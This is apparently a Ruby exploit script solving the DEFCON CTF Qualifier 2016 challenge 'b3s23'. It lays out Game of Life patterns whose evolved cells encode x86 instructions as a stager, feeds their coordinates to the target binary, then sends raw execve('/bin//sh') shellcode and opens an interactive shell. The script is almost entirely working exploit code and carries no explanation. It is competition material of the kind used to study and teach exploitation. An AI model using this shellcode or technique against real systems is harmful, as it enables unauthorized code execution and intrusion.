DEFCON CTF Qual 2016 b3s23

b3s23.rb

#!/usr/bin/env ruby

require './ctfutils'

pipe = popen('./b3s23')

board = <<EOF
       o oo
ooo    oo o


     oo
     o o
     o
EOF

box = %w(oo oo)
star = %w(_o_ o_o _o_)
bar = %w(o o o)

def set(board, x, y)
  while y >= board.size
    board << ''
  end
  while x >= board[y].size
    board[y] << ' '
  end
  board[y][x] = 'o'
  board
end

def setb(board, block, x, y)
  block.each_with_index do |l, j|
    l.each_char.each_with_index do |c, i|
      if c == 'o'
        set(board, x+i, y+j)
      end
    end
  end
end

board = board.split("\n")

x=14 ; y=7
setb(board, %w(_oo_ o__o _oo_), x, y-1)
setb(board, box, x+6, y-1)

setb(board, %w(o_oo oo_o), x+8+2, y)
setb(board, star, x+16+2, y-2)

x += 16

setb(board, %w(_oo_ o__o _oo_), x+8, y-1)
setb(board, box, x+15, y)

# mov al, 3
setb(board, box, x+18, y)
setb(board, box, x+30, y)

# mov edx, ecx
setb(board, bar, x+40, y-1)
setb(board, star, x+44, y-1)

# nop
setb(board, %w(_oo_ o__o _oo_), x+48, y-1)

# int 0x80
setb(board, box, x+48+8, y-1)
setb(board, box, x+52+8, y-1)
setb(board, box, x+55+8, y-1)

File.open('l', 'w') do |of|
  of.puts 15
  of.puts board * "\n"
end

STDERR.puts board * "\n"

y = 0
board.each do |line|
  x = 0
  line.each_char do |ch|
    if ch == 'o'
      pipe.puts "#{x},#{y}"
    end
    x += 1
  end
  y += 1
end
pipe.puts 'a'

sleep 1

payload = 'X' * 5
payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80".b

pipe.puts payload

pipe.interactive